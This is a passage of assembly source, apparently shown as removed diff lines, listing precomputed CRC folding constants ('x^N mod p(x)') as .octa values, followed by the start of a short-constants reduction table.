mod p(x)` << 1, x^229440 mod p(x)` << 1 */ - .octa 0x000000009cde8348000000000a8de642 - - /* x^228352 mod p(x)` << 1, x^228416 mod p(x)` << 1 */ - .octa 0x0000000038d3c2a60000000062ea130c - - /* x^227328 mod p(x)` << 1, x^227392 mod p(x)` << 1 */ - .octa 0x000000011b25f26000000001eb31cbb2 - - /* x^226304 mod p(x)` << 1, x^226368 mod p(x)` << 1 */ - .octa 0x000000001629e6f00000000170783448 - - /* x^225280 mod p(x)` << 1, x^225344 mod p(x)` 
<< 1 */ - .octa 0x0000000160838b4c00000001a684b4c6 - - /* x^224256 mod p(x)` << 1, x^224320 mod p(x)` << 1 */ - .octa 0x000000007a44011c00000000253ca5b4 - - /* x^223232 mod p(x)` << 1, x^223296 mod p(x)` << 1 */ - .octa 0x00000000226f417a0000000057b4b1e2 - - /* x^222208 mod p(x)` << 1, x^222272 mod p(x)` << 1 */ - .octa 0x0000000045eb2eb400000000b6bd084c - - /* x^221184 mod p(x)` << 1, x^221248 mod p(x)` << 1 */ - .octa 0x000000014459d70c0000000123c2d592 - - /* x^220160 mod p(x)` << 1, x^220224 mod p(x)` << 1 */ - .octa 0x00000001d406ed8200000000159dafce - - /* x^219136 mod p(x)` << 1, x^219200 mod p(x)` << 1 */ - .octa 0x0000000160c8e1a80000000127e1a64e - - /* x^218112 mod p(x)` << 1, x^218176 mod p(x)` << 1 */ - .octa 0x0000000027ba80980000000056860754 - - /* x^217088 mod p(x)` << 1, x^217152 mod p(x)` << 1 */ - .octa 0x000000006d92d01800000001e661aae8 - - /* x^216064 mod p(x)` << 1, x^216128 mod p(x)` << 1 */ - .octa 0x000000012ed7e3f200000000f82c6166 - - /* x^215040 mod p(x)` << 1, x^215104 mod p(x)` << 1 */ - .octa 0x000000002dc8778800000000c4f9c7ae - - /* x^214016 mod p(x)` << 1, x^214080 mod p(x)` << 1 */ - .octa 0x0000000018240bb80000000074203d20 - - /* x^212992 mod p(x)` << 1, x^213056 mod p(x)` << 1 */ - .octa 0x000000001ad381580000000198173052 - - /* x^211968 mod p(x)` << 1, x^212032 mod p(x)` << 1 */ - .octa 0x00000001396b78f200000001ce8aba54 - - /* x^210944 mod p(x)` << 1, x^211008 mod p(x)` << 1 */ - .octa 0x000000011a68133400000001850d5d94 - - /* x^209920 mod p(x)` << 1, x^209984 mod p(x)` << 1 */ - .octa 0x000000012104732e00000001d609239c - - /* x^208896 mod p(x)` << 1, x^208960 mod p(x)` << 1 */ - .octa 0x00000000a140d90c000000001595f048 - - /* x^207872 mod p(x)` << 1, x^207936 mod p(x)` << 1 */ - .octa 0x00000001b7215eda0000000042ccee08 - - /* x^206848 mod p(x)` << 1, x^206912 mod p(x)` << 1 */ - .octa 0x00000001aaf1df3c000000010a389d74 - - /* x^205824 mod p(x)` << 1, x^205888 mod p(x)` << 1 */ - .octa 0x0000000029d15b8a000000012a840da6 - - /* x^204800 mod p(x)` << 1, x^204864 mod p(x)` << 1 */ - .octa 0x00000000f1a96922000000001d181c0c - - /* x^203776 mod p(x)` << 1, x^203840 mod p(x)` << 1 */ - .octa 0x00000001ac80d03c0000000068b7d1f6 - - /* x^202752 mod p(x)` << 1, x^202816 mod p(x)` << 1 */ - .octa 0x000000000f11d56a000000005b0f14fc - - /* x^201728 mod p(x)` << 1, x^201792 mod p(x)` << 1 */ - .octa 0x00000001f1c022a20000000179e9e730 - - /* x^200704 mod p(x)` << 1, x^200768 mod p(x)` << 1 */ - .octa 0x0000000173d00ae200000001ce1368d6 - - /* x^199680 mod p(x)` << 1, x^199744 mod p(x)` << 1 */ - .octa 0x00000001d4ffe4ac0000000112c3a84c - - /* x^198656 mod p(x)` << 1, x^198720 mod p(x)` << 1 */ - .octa 0x000000016edc5ae400000000de940fee - - /* x^197632 mod p(x)` << 1, x^197696 mod p(x)` << 1 */ - .octa 0x00000001f1a0214000000000fe896b7e - - /* x^196608 mod p(x)` << 1, x^196672 mod p(x)` << 1 */ - .octa 0x00000000ca0b28a000000001f797431c - - /* x^195584 mod p(x)` << 1, x^195648 mod p(x)` << 1 */ - .octa 0x00000001928e30a20000000053e989ba - - /* x^194560 mod p(x)` << 1, x^194624 mod p(x)` << 1 */ - .octa 0x0000000097b1b002000000003920cd16 - - /* x^193536 mod p(x)` << 1, x^193600 mod p(x)` << 1 */ - .octa 0x00000000b15bf90600000001e6f579b8 - - /* x^192512 mod p(x)` << 1, x^192576 mod p(x)` << 1 */ - .octa 0x00000000411c5d52000000007493cb0a - - /* x^191488 mod p(x)` << 1, x^191552 mod p(x)` << 1 */ - .octa 0x00000001c36f330000000001bdd376d8 - - /* x^190464 mod p(x)` << 1, x^190528 mod p(x)` << 1 */ - .octa 0x00000001119227e0000000016badfee6 - - /* x^189440 mod p(x)` << 1, 
x^189504 mod p(x)` << 1 */ - .octa 0x00000000114d47020000000071de5c58 - - /* x^188416 mod p(x)` << 1, x^188480 mod p(x)` << 1 */ - .octa 0x00000000458b5b9800000000453f317c - - /* x^187392 mod p(x)` << 1, x^187456 mod p(x)` << 1 */ - .octa 0x000000012e31fb8e0000000121675cce - - /* x^186368 mod p(x)` << 1, x^186432 mod p(x)` << 1 */ - .octa 0x000000005cf619d800000001f409ee92 - - /* x^185344 mod p(x)` << 1, x^185408 mod p(x)` << 1 */ - .octa 0x0000000063f4d8b200000000f36b9c88 - - /* x^184320 mod p(x)` << 1, x^184384 mod p(x)` << 1 */ - .octa 0x000000004138dc8a0000000036b398f4 - - /* x^183296 mod p(x)` << 1, x^183360 mod p(x)` << 1 */ - .octa 0x00000001d29ee8e000000001748f9adc - - /* x^182272 mod p(x)` << 1, x^182336 mod p(x)` << 1 */ - .octa 0x000000006a08ace800000001be94ec00 - - /* x^181248 mod p(x)` << 1, x^181312 mod p(x)` << 1 */ - .octa 0x0000000127d4201000000000b74370d6 - - /* x^180224 mod p(x)` << 1, x^180288 mod p(x)` << 1 */ - .octa 0x0000000019d76b6200000001174d0b98 - - /* x^179200 mod p(x)` << 1, x^179264 mod p(x)` << 1 */ - .octa 0x00000001b1471f6e00000000befc06a4 - - /* x^178176 mod p(x)` << 1, x^178240 mod p(x)` << 1 */ - .octa 0x00000001f64c19cc00000001ae125288 - - /* x^177152 mod p(x)` << 1, x^177216 mod p(x)` << 1 */ - .octa 0x00000000003c0ea00000000095c19b34 - - /* x^176128 mod p(x)` << 1, x^176192 mod p(x)` << 1 */ - .octa 0x000000014d73abf600000001a78496f2 - - /* x^175104 mod p(x)` << 1, x^175168 mod p(x)` << 1 */ - .octa 0x00000001620eb84400000001ac5390a0 - - /* x^174080 mod p(x)` << 1, x^174144 mod p(x)` << 1 */ - .octa 0x0000000147655048000000002a80ed6e - - /* x^173056 mod p(x)` << 1, x^173120 mod p(x)` << 1 */ - .octa 0x0000000067b5077e00000001fa9b0128 - - /* x^172032 mod p(x)` << 1, x^172096 mod p(x)` << 1 */ - .octa 0x0000000010ffe20600000001ea94929e - - /* x^171008 mod p(x)` << 1, x^171072 mod p(x)` << 1 */ - .octa 0x000000000fee8f1e0000000125f4305c - - /* x^169984 mod p(x)` << 1, x^170048 mod p(x)` << 1 */ - .octa 0x00000001da26fbae00000001471e2002 - - /* x^168960 mod p(x)` << 1, x^169024 mod p(x)` << 1 */ - .octa 0x00000001b3a8bd880000000132d2253a - - /* x^167936 mod p(x)` << 1, x^168000 mod p(x)` << 1 */ - .octa 0x00000000e8f3898e00000000f26b3592 - - /* x^166912 mod p(x)` << 1, x^166976 mod p(x)` << 1 */ - .octa 0x00000000b0d0d28c00000000bc8b67b0 - - /* x^165888 mod p(x)` << 1, x^165952 mod p(x)` << 1 */ - .octa 0x0000000030f2a798000000013a826ef2 - - /* x^164864 mod p(x)` << 1, x^164928 mod p(x)` << 1 */ - .octa 0x000000000fba10020000000081482c84 - - /* x^163840 mod p(x)` << 1, x^163904 mod p(x)` << 1 */ - .octa 0x00000000bdb9bd7200000000e77307c2 - - /* x^162816 mod p(x)` << 1, x^162880 mod p(x)` << 1 */ - .octa 0x0000000075d3bf5a00000000d4a07ec8 - - /* x^161792 mod p(x)` << 1, x^161856 mod p(x)` << 1 */ - .octa 0x00000000ef1f98a00000000017102100 - - /* x^160768 mod p(x)` << 1, x^160832 mod p(x)` << 1 */ - .octa 0x00000000689c760200000000db406486 - - /* x^159744 mod p(x)` << 1, x^159808 mod p(x)` << 1 */ - .octa 0x000000016d5fa5fe0000000192db7f88 - - /* x^158720 mod p(x)` << 1, x^158784 mod p(x)` << 1 */ - .octa 0x00000001d0d2b9ca000000018bf67b1e - - /* x^157696 mod p(x)` << 1, x^157760 mod p(x)` << 1 */ - .octa 0x0000000041e7b470000000007c09163e - - /* x^156672 mod p(x)` << 1, x^156736 mod p(x)` << 1 */ - .octa 0x00000001cbb6495e000000000adac060 - - /* x^155648 mod p(x)` << 1, x^155712 mod p(x)` << 1 */ - .octa 0x000000010052a0b000000000bd8316ae - - /* x^154624 mod p(x)` << 1, x^154688 mod p(x)` << 1 */ - .octa 0x00000001d8effb5c000000019f09ab54 - - /* x^153600 
mod p(x)` << 1, x^153664 mod p(x)` << 1 */ - .octa 0x00000001d969853c0000000125155542 - - /* x^152576 mod p(x)` << 1, x^152640 mod p(x)` << 1 */ - .octa 0x00000000523ccce2000000018fdb5882 - - /* x^151552 mod p(x)` << 1, x^151616 mod p(x)` << 1 */ - .octa 0x000000001e2436bc00000000e794b3f4 - - /* x^150528 mod p(x)` << 1, x^150592 mod p(x)` << 1 */ - .octa 0x00000000ddd1c3a2000000016f9bb022 - - /* x^149504 mod p(x)` << 1, x^149568 mod p(x)` << 1 */ - .octa 0x0000000019fcfe3800000000290c9978 - - /* x^148480 mod p(x)` << 1, x^148544 mod p(x)` << 1 */ - .octa 0x00000001ce95db640000000083c0f350 - - /* x^147456 mod p(x)` << 1, x^147520 mod p(x)` << 1 */ - .octa 0x00000000af5828060000000173ea6628 - - /* x^146432 mod p(x)` << 1, x^146496 mod p(x)` << 1 */ - .octa 0x00000001006388f600000001c8b4e00a - - /* x^145408 mod p(x)` << 1, x^145472 mod p(x)` << 1 */ - .octa 0x0000000179eca00a00000000de95d6aa - - /* x^144384 mod p(x)` << 1, x^144448 mod p(x)` << 1 */ - .octa 0x0000000122410a6a000000010b7f7248 - - /* x^143360 mod p(x)` << 1, x^143424 mod p(x)` << 1 */ - .octa 0x000000004288e87c00000001326e3a06 - - /* x^142336 mod p(x)` << 1, x^142400 mod p(x)` << 1 */ - .octa 0x000000016c5490da00000000bb62c2e6 - - /* x^141312 mod p(x)` << 1, x^141376 mod p(x)` << 1 */ - .octa 0x00000000d1c71f6e0000000156a4b2c2 - - /* x^140288 mod p(x)` << 1, x^140352 mod p(x)` << 1 */ - .octa 0x00000001b4ce08a6000000011dfe763a - - /* x^139264 mod p(x)` << 1, x^139328 mod p(x)` << 1 */ - .octa 0x00000001466ba60c000000007bcca8e2 - - /* x^138240 mod p(x)` << 1, x^138304 mod p(x)` << 1 */ - .octa 0x00000001f6c488a40000000186118faa - - /* x^137216 mod p(x)` << 1, x^137280 mod p(x)` << 1 */ - .octa 0x000000013bfb06820000000111a65a88 - - /* x^136192 mod p(x)` << 1, x^136256 mod p(x)` << 1 */ - .octa 0x00000000690e9e54000000003565e1c4 - - /* x^135168 mod p(x)` << 1, x^135232 mod p(x)` << 1 */ - .octa 0x00000000281346b6000000012ed02a82 - - /* x^134144 mod p(x)` << 1, x^134208 mod p(x)` << 1 */ - .octa 0x000000015646402400000000c486ecfc - - /* x^133120 mod p(x)` << 1, x^133184 mod p(x)` << 1 */ - .octa 0x000000016063a8dc0000000001b951b2 - - /* x^132096 mod p(x)` << 1, x^132160 mod p(x)` << 1 */ - .octa 0x0000000116a663620000000048143916 - - /* x^131072 mod p(x)` << 1, x^131136 mod p(x)` << 1 */ - .octa 0x000000017e8aa4d200000001dc2ae124 - - /* x^130048 mod p(x)` << 1, x^130112 mod p(x)` << 1 */ - .octa 0x00000001728eb10c00000001416c58d6 - - /* x^129024 mod p(x)` << 1, x^129088 mod p(x)` << 1 */ - .octa 0x00000001b08fd7fa00000000a479744a - - /* x^128000 mod p(x)` << 1, x^128064 mod p(x)` << 1 */ - .octa 0x00000001092a16e80000000096ca3a26 - - /* x^126976 mod p(x)` << 1, x^127040 mod p(x)` << 1 */ - .octa 0x00000000a505637c00000000ff223d4e - - /* x^125952 mod p(x)` << 1, x^126016 mod p(x)` << 1 */ - .octa 0x00000000d94869b2000000010e84da42 - - /* x^124928 mod p(x)` << 1, x^124992 mod p(x)` << 1 */ - .octa 0x00000001c8b203ae00000001b61ba3d0 - - /* x^123904 mod p(x)` << 1, x^123968 mod p(x)` << 1 */ - .octa 0x000000005704aea000000000680f2de8 - - /* x^122880 mod p(x)` << 1, x^122944 mod p(x)` << 1 */ - .octa 0x000000012e295fa2000000008772a9a8 - - /* x^121856 mod p(x)` << 1, x^121920 mod p(x)` << 1 */ - .octa 0x000000011d0908bc0000000155f295bc - - /* x^120832 mod p(x)` << 1, x^120896 mod p(x)` << 1 */ - .octa 0x0000000193ed97ea00000000595f9282 - - /* x^119808 mod p(x)` << 1, x^119872 mod p(x)` << 1 */ - .octa 0x000000013a0f1c520000000164b1c25a - - /* x^118784 mod p(x)` << 1, x^118848 mod p(x)` << 1 */ - .octa 0x000000010c2c40c000000000fbd67c50 
- - /* x^117760 mod p(x)` << 1, x^117824 mod p(x)` << 1 */ - .octa 0x00000000ff6fac3e0000000096076268 - - /* x^116736 mod p(x)` << 1, x^116800 mod p(x)` << 1 */ - .octa 0x000000017b3609c000000001d288e4cc - - /* x^115712 mod p(x)` << 1, x^115776 mod p(x)` << 1 */ - .octa 0x0000000088c8c92200000001eaac1bdc - - /* x^114688 mod p(x)` << 1, x^114752 mod p(x)` << 1 */ - .octa 0x00000001751baae600000001f1ea39e2 - - /* x^113664 mod p(x)` << 1, x^113728 mod p(x)` << 1 */ - .octa 0x000000010795297200000001eb6506fc - - /* x^112640 mod p(x)` << 1, x^112704 mod p(x)` << 1 */ - .octa 0x0000000162b00abe000000010f806ffe - - /* x^111616 mod p(x)` << 1, x^111680 mod p(x)` << 1 */ - .octa 0x000000000d7b404c000000010408481e - - /* x^110592 mod p(x)` << 1, x^110656 mod p(x)` << 1 */ - .octa 0x00000000763b13d40000000188260534 - - /* x^109568 mod p(x)` << 1, x^109632 mod p(x)` << 1 */ - .octa 0x00000000f6dc22d80000000058fc73e0 - - /* x^108544 mod p(x)` << 1, x^108608 mod p(x)` << 1 */ - .octa 0x000000007daae06000000000391c59b8 - - /* x^107520 mod p(x)` << 1, x^107584 mod p(x)` << 1 */ - .octa 0x000000013359ab7c000000018b638400 - - /* x^106496 mod p(x)` << 1, x^106560 mod p(x)` << 1 */ - .octa 0x000000008add438a000000011738f5c4 - - /* x^105472 mod p(x)` << 1, x^105536 mod p(x)` << 1 */ - .octa 0x00000001edbefdea000000008cf7c6da - - /* x^104448 mod p(x)` << 1, x^104512 mod p(x)` << 1 */ - .octa 0x000000004104e0f800000001ef97fb16 - - /* x^103424 mod p(x)` << 1, x^103488 mod p(x)` << 1 */ - .octa 0x00000000b48a82220000000102130e20 - - /* x^102400 mod p(x)` << 1, x^102464 mod p(x)` << 1 */ - .octa 0x00000001bcb4684400000000db968898 - - /* x^101376 mod p(x)` << 1, x^101440 mod p(x)` << 1 */ - .octa 0x000000013293ce0a00000000b5047b5e - - /* x^100352 mod p(x)` << 1, x^100416 mod p(x)` << 1 */ - .octa 0x00000001710d0844000000010b90fdb2 - - /* x^99328 mod p(x)` << 1, x^99392 mod p(x)` << 1 */ - .octa 0x0000000117907f6e000000004834a32e - - /* x^98304 mod p(x)` << 1, x^98368 mod p(x)` << 1 */ - .octa 0x0000000087ddf93e0000000059c8f2b0 - - /* x^97280 mod p(x)` << 1, x^97344 mod p(x)` << 1 */ - .octa 0x000000005970e9b00000000122cec508 - - /* x^96256 mod p(x)` << 1, x^96320 mod p(x)` << 1 */ - .octa 0x0000000185b2b7d0000000000a330cda - - /* x^95232 mod p(x)` << 1, x^95296 mod p(x)` << 1 */ - .octa 0x00000001dcee0efc000000014a47148c - - /* x^94208 mod p(x)` << 1, x^94272 mod p(x)` << 1 */ - .octa 0x0000000030da27220000000042c61cb8 - - /* x^93184 mod p(x)` << 1, x^93248 mod p(x)` << 1 */ - .octa 0x000000012f925a180000000012fe6960 - - /* x^92160 mod p(x)` << 1, x^92224 mod p(x)` << 1 */ - .octa 0x00000000dd2e357c00000000dbda2c20 - - /* x^91136 mod p(x)` << 1, x^91200 mod p(x)` << 1 */ - .octa 0x00000000071c80de000000011122410c - - /* x^90112 mod p(x)` << 1, x^90176 mod p(x)` << 1 */ - .octa 0x000000011513140a00000000977b2070 - - /* x^89088 mod p(x)` << 1, x^89152 mod p(x)` << 1 */ - .octa 0x00000001df876e8e000000014050438e - - /* x^88064 mod p(x)` << 1, x^88128 mod p(x)` << 1 */ - .octa 0x000000015f81d6ce0000000147c840e8 - - /* x^87040 mod p(x)` << 1, x^87104 mod p(x)` << 1 */ - .octa 0x000000019dd94dbe00000001cc7c88ce - - /* x^86016 mod p(x)` << 1, x^86080 mod p(x)` << 1 */ - .octa 0x00000001373d206e00000001476b35a4 - - /* x^84992 mod p(x)` << 1, x^85056 mod p(x)` << 1 */ - .octa 0x00000000668ccade000000013d52d508 - - /* x^83968 mod p(x)` << 1, x^84032 mod p(x)` << 1 */ - .octa 0x00000001b192d268000000008e4be32e - - /* x^82944 mod p(x)` << 1, x^83008 mod p(x)` << 1 */ - .octa 0x00000000e30f3a7800000000024120fe - - /* x^81920 mod 
p(x)` << 1, x^81984 mod p(x)` << 1 */ - .octa 0x000000010ef1f7bc00000000ddecddb4 - - /* x^80896 mod p(x)` << 1, x^80960 mod p(x)` << 1 */ - .octa 0x00000001f5ac738000000000d4d403bc - - /* x^79872 mod p(x)` << 1, x^79936 mod p(x)` << 1 */ - .octa 0x000000011822ea7000000001734b89aa - - /* x^78848 mod p(x)` << 1, x^78912 mod p(x)` << 1 */ - .octa 0x00000000c3a33848000000010e7a58d6 - - /* x^77824 mod p(x)` << 1, x^77888 mod p(x)` << 1 */ - .octa 0x00000001bd151c2400000001f9f04e9c - - /* x^76800 mod p(x)` << 1, x^76864 mod p(x)` << 1 */ - .octa 0x0000000056002d7600000000b692225e - - /* x^75776 mod p(x)` << 1, x^75840 mod p(x)` << 1 */ - .octa 0x000000014657c4f4000000019b8d3f3e - - /* x^74752 mod p(x)` << 1, x^74816 mod p(x)` << 1 */ - .octa 0x0000000113742d7c00000001a874f11e - - /* x^73728 mod p(x)` << 1, x^73792 mod p(x)` << 1 */ - .octa 0x000000019c5920ba000000010d5a4254 - - /* x^72704 mod p(x)` << 1, x^72768 mod p(x)` << 1 */ - .octa 0x000000005216d2d600000000bbb2f5d6 - - /* x^71680 mod p(x)` << 1, x^71744 mod p(x)` << 1 */ - .octa 0x0000000136f5ad8a0000000179cc0e36 - - /* x^70656 mod p(x)` << 1, x^70720 mod p(x)` << 1 */ - .octa 0x000000018b07beb600000001dca1da4a - - /* x^69632 mod p(x)` << 1, x^69696 mod p(x)` << 1 */ - .octa 0x00000000db1e93b000000000feb1a192 - - /* x^68608 mod p(x)` << 1, x^68672 mod p(x)` << 1 */ - .octa 0x000000000b96fa3a00000000d1eeedd6 - - /* x^67584 mod p(x)` << 1, x^67648 mod p(x)` << 1 */ - .octa 0x00000001d9968af0000000008fad9bb4 - - /* x^66560 mod p(x)` << 1, x^66624 mod p(x)` << 1 */ - .octa 0x000000000e4a77a200000001884938e4 - - /* x^65536 mod p(x)` << 1, x^65600 mod p(x)` << 1 */ - .octa 0x00000000508c2ac800000001bc2e9bc0 - - /* x^64512 mod p(x)` << 1, x^64576 mod p(x)` << 1 */ - .octa 0x0000000021572a8000000001f9658a68 - - /* x^63488 mod p(x)` << 1, x^63552 mod p(x)` << 1 */ - .octa 0x00000001b859daf2000000001b9224fc - - /* x^62464 mod p(x)` << 1, x^62528 mod p(x)` << 1 */ - .octa 0x000000016f7884740000000055b2fb84 - - /* x^61440 mod p(x)` << 1, x^61504 mod p(x)` << 1 */ - .octa 0x00000001b438810e000000018b090348 - - /* x^60416 mod p(x)` << 1, x^60480 mod p(x)` << 1 */ - .octa 0x0000000095ddc6f2000000011ccbd5ea - - /* x^59392 mod p(x)` << 1, x^59456 mod p(x)` << 1 */ - .octa 0x00000001d977c20c0000000007ae47f8 - - /* x^58368 mod p(x)` << 1, x^58432 mod p(x)` << 1 */ - .octa 0x00000000ebedb99a0000000172acbec0 - - /* x^57344 mod p(x)` << 1, x^57408 mod p(x)` << 1 */ - .octa 0x00000001df9e9e9200000001c6e3ff20 - - /* x^56320 mod p(x)` << 1, x^56384 mod p(x)` << 1 */ - .octa 0x00000001a4a3f95200000000e1b38744 - - /* x^55296 mod p(x)` << 1, x^55360 mod p(x)` << 1 */ - .octa 0x00000000e2f5122000000000791585b2 - - /* x^54272 mod p(x)` << 1, x^54336 mod p(x)` << 1 */ - .octa 0x000000004aa01f3e00000000ac53b894 - - /* x^53248 mod p(x)` << 1, x^53312 mod p(x)` << 1 */ - .octa 0x00000000b3e90a5800000001ed5f2cf4 - - /* x^52224 mod p(x)` << 1, x^52288 mod p(x)` << 1 */ - .octa 0x000000000c9ca2aa00000001df48b2e0 - - /* x^51200 mod p(x)` << 1, x^51264 mod p(x)` << 1 */ - .octa 0x000000015168231600000000049c1c62 - - /* x^50176 mod p(x)` << 1, x^50240 mod p(x)` << 1 */ - .octa 0x0000000036fce78c000000017c460c12 - - /* x^49152 mod p(x)` << 1, x^49216 mod p(x)` << 1 */ - .octa 0x000000009037dc10000000015be4da7e - - /* x^48128 mod p(x)` << 1, x^48192 mod p(x)` << 1 */ - .octa 0x00000000d3298582000000010f38f668 - - /* x^47104 mod p(x)` << 1, x^47168 mod p(x)` << 1 */ - .octa 0x00000001b42e8ad60000000039f40a00 - - /* x^46080 mod p(x)` << 1, x^46144 mod p(x)` << 1 */ - .octa 
0x00000000142a983800000000bd4c10c4 - - /* x^45056 mod p(x)` << 1, x^45120 mod p(x)` << 1 */ - .octa 0x0000000109c7f1900000000042db1d98 - - /* x^44032 mod p(x)` << 1, x^44096 mod p(x)` << 1 */ - .octa 0x0000000056ff931000000001c905bae6 - - /* x^43008 mod p(x)` << 1, x^43072 mod p(x)` << 1 */ - .octa 0x00000001594513aa00000000069d40ea - - /* x^41984 mod p(x)` << 1, x^42048 mod p(x)` << 1 */ - .octa 0x00000001e3b5b1e8000000008e4fbad0 - - /* x^40960 mod p(x)` << 1, x^41024 mod p(x)` << 1 */ - .octa 0x000000011dd5fc080000000047bedd46 - - /* x^39936 mod p(x)` << 1, x^40000 mod p(x)` << 1 */ - .octa 0x00000001675f0cc20000000026396bf8 - - /* x^38912 mod p(x)` << 1, x^38976 mod p(x)` << 1 */ - .octa 0x00000000d1c8dd4400000000379beb92 - - /* x^37888 mod p(x)` << 1, x^37952 mod p(x)` << 1 */ - .octa 0x0000000115ebd3d8000000000abae54a - - /* x^36864 mod p(x)` << 1, x^36928 mod p(x)` << 1 */ - .octa 0x00000001ecbd0dac0000000007e6a128 - - /* x^35840 mod p(x)` << 1, x^35904 mod p(x)` << 1 */ - .octa 0x00000000cdf67af2000000000ade29d2 - - /* x^34816 mod p(x)` << 1, x^34880 mod p(x)` << 1 */ - .octa 0x000000004c01ff4c00000000f974c45c - - /* x^33792 mod p(x)` << 1, x^33856 mod p(x)` << 1 */ - .octa 0x00000000f2d8657e00000000e77ac60a - - /* x^32768 mod p(x)` << 1, x^32832 mod p(x)` << 1 */ - .octa 0x000000006bae74c40000000145895816 - - /* x^31744 mod p(x)` << 1, x^31808 mod p(x)` << 1 */ - .octa 0x0000000152af8aa00000000038e362be - - /* x^30720 mod p(x)` << 1, x^30784 mod p(x)` << 1 */ - .octa 0x0000000004663802000000007f991a64 - - /* x^29696 mod p(x)` << 1, x^29760 mod p(x)` << 1 */ - .octa 0x00000001ab2f5afc00000000fa366d3a - - /* x^28672 mod p(x)` << 1, x^28736 mod p(x)` << 1 */ - .octa 0x0000000074a4ebd400000001a2bb34f0 - - /* x^27648 mod p(x)` << 1, x^27712 mod p(x)` << 1 */ - .octa 0x00000001d7ab3a4c0000000028a9981e - - /* x^26624 mod p(x)` << 1, x^26688 mod p(x)` << 1 */ - .octa 0x00000001a8da60c600000001dbc672be - - /* x^25600 mod p(x)` << 1, x^25664 mod p(x)` << 1 */ - .octa 0x000000013cf6382000000000b04d77f6 - - /* x^24576 mod p(x)` << 1, x^24640 mod p(x)` << 1 */ - .octa 0x00000000bec12e1e0000000124400d96 - - /* x^23552 mod p(x)` << 1, x^23616 mod p(x)` << 1 */ - .octa 0x00000001c6368010000000014ca4b414 - - /* x^22528 mod p(x)` << 1, x^22592 mod p(x)` << 1 */ - .octa 0x00000001e6e78758000000012fe2c938 - - /* x^21504 mod p(x)` << 1, x^21568 mod p(x)` << 1 */ - .octa 0x000000008d7f2b3c00000001faed01e6 - - /* x^20480 mod p(x)` << 1, x^20544 mod p(x)` << 1 */ - .octa 0x000000016b4a156e000000007e80ecfe - - /* x^19456 mod p(x)` << 1, x^19520 mod p(x)` << 1 */ - .octa 0x00000001c63cfeb60000000098daee94 - - /* x^18432 mod p(x)` << 1, x^18496 mod p(x)` << 1 */ - .octa 0x000000015f902670000000010a04edea - - /* x^17408 mod p(x)` << 1, x^17472 mod p(x)` << 1 */ - .octa 0x00000001cd5de11e00000001c00b4524 - - /* x^16384 mod p(x)` << 1, x^16448 mod p(x)` << 1 */ - .octa 0x000000001acaec540000000170296550 - - /* x^15360 mod p(x)` << 1, x^15424 mod p(x)` << 1 */ - .octa 0x000000002bd0ca780000000181afaa48 - - /* x^14336 mod p(x)` << 1, x^14400 mod p(x)` << 1 */ - .octa 0x0000000032d63d5c0000000185a31ffa - - /* x^13312 mod p(x)` << 1, x^13376 mod p(x)` << 1 */ - .octa 0x000000001c6d4e4c000000002469f608 - - /* x^12288 mod p(x)` << 1, x^12352 mod p(x)` << 1 */ - .octa 0x0000000106a60b92000000006980102a - - /* x^11264 mod p(x)` << 1, x^11328 mod p(x)` << 1 */ - .octa 0x00000000d3855e120000000111ea9ca8 - - /* x^10240 mod p(x)` << 1, x^10304 mod p(x)` << 1 */ - .octa 0x00000000e312563600000001bd1d29ce - - /* x^9216 mod 
p(x)` << 1, x^9280 mod p(x)` << 1 */ - .octa 0x000000009e8f7ea400000001b34b9580 - - /* x^8192 mod p(x)` << 1, x^8256 mod p(x)` << 1 */ - .octa 0x00000001c82e562c000000003076054e - - /* x^7168 mod p(x)` << 1, x^7232 mod p(x)` << 1 */ - .octa 0x00000000ca9f09ce000000012a608ea4 - - /* x^6144 mod p(x)` << 1, x^6208 mod p(x)` << 1 */ - .octa 0x00000000c63764e600000000784d05fe - - /* x^5120 mod p(x)` << 1, x^5184 mod p(x)` << 1 */ - .octa 0x0000000168d2e49e000000016ef0d82a - - /* x^4096 mod p(x)` << 1, x^4160 mod p(x)` << 1 */ - .octa 0x00000000e986c1480000000075bda454 - - /* x^3072 mod p(x)` << 1, x^3136 mod p(x)` << 1 */ - .octa 0x00000000cfb65894000000003dc0a1c4 - - /* x^2048 mod p(x)` << 1, x^2112 mod p(x)` << 1 */ - .octa 0x0000000111cadee400000000e9a5d8be - - /* x^1024 mod p(x)` << 1, x^1088 mod p(x)` << 1 */ - .octa 0x0000000171fb63ce00000001609bc4b4 - - .short_constants : - - /* Reduce final 1024-2048 bits to 64 bits, shifting 32 bits to include the - trailing 32 bits of zeros */ - /* x^1952 mod p(x)`, x^1984 mod p(x)`, x^2016 mod p(x)`, x^2048 mod p(x)` */ - .octa 0x7fec2963e5bf80485cf015c388e56f72 - - /* x^1824 mod p(x)`, x^1856 mod p(x)`, x^1888 mod p(x)`, x^1920 mod p(x)` */ - .octa 0x38e888d4844752a9963a18920246e2e6 - - /* x^1696 mod p(x)`, x^1728 mod p(x)`, x^1760 mod p(x)`, x^1792 mod p(x)` */ - .octa 0x42316c00730206ad419a441956993a31 - - /* x^1568 mod p(x)`, x^1600 mod p(x)`, x^1632 mod p(x)`, x^1664 mod p(x)` */ - .octa 0x543d5c543e65ddf9924752ba2b830011 - - /* x^1440 mod p(x)`, x^1472 mod p(x)`, x^1504 mod p(x)`, x^1536 mod p(x)` */ - .octa 0x78e87aaf56767c9255bd7f9518e4a304 - - /* x^1312 mod p(x)`, x^1344 mod p(x)`, x^1376 mod p(x)`, x^1408 mod p(x)` */ - .octa 0x8f68fcec1903da7f6d76739fe0553f1e - - /* x^1184 mod p(x)`, x^1216 mod p(x)`, x^1248 mod p(x)`, x^1280 mod p(x)` */ - .octa 0x3f4840246791d588c133722b1fe0b5c3 - - /* x^1056 mod p(x)`, x^1088 mod p(x)`, x^1120 mod p(x)`, x^1152 mod p(x)` */ - .octa 0x34c96751b04de25a64b67ee0e55ef1f3 - - /* x^928 mod p(x)`, x^960 mod p(x)`, x^992 mod p(x)`, x^1024 mod p(x)` */ - .octa 0x156c8e180b4a395b069db049b8fdb1e7 - - /* x^800 mod p(x)`, x^832 mod p(x)`, x^864 mod p(x)`, x^896 mod p(x)` */ - .octa 0xe0b99ccbe661f7bea11bfaf3c9e90b9e - - /* x^672 mod p(x)`, x^704 mod p(x)`, x^736 mod p(x)`, x^768 mod p(x)` */ - .octa 0x041d37768cd75659817cdc5119b29a35 - - /* x^544 mod p(x)`, x^576 mod p(x)`, x^608 mod p(x)`, x^640 mod p(x)` */ - .octa 0x3a0777818cfaa9651ce9d94b36c41f1c - - /* x^416 mod p(x)`, x^448 mod p(x)`, x^480 mod p(x)`, x^512 mod p(x)` */ - .octa 0x0e148e8252377a554f256efcb82be955 - - /* x^288 mod p(x)`, x^320 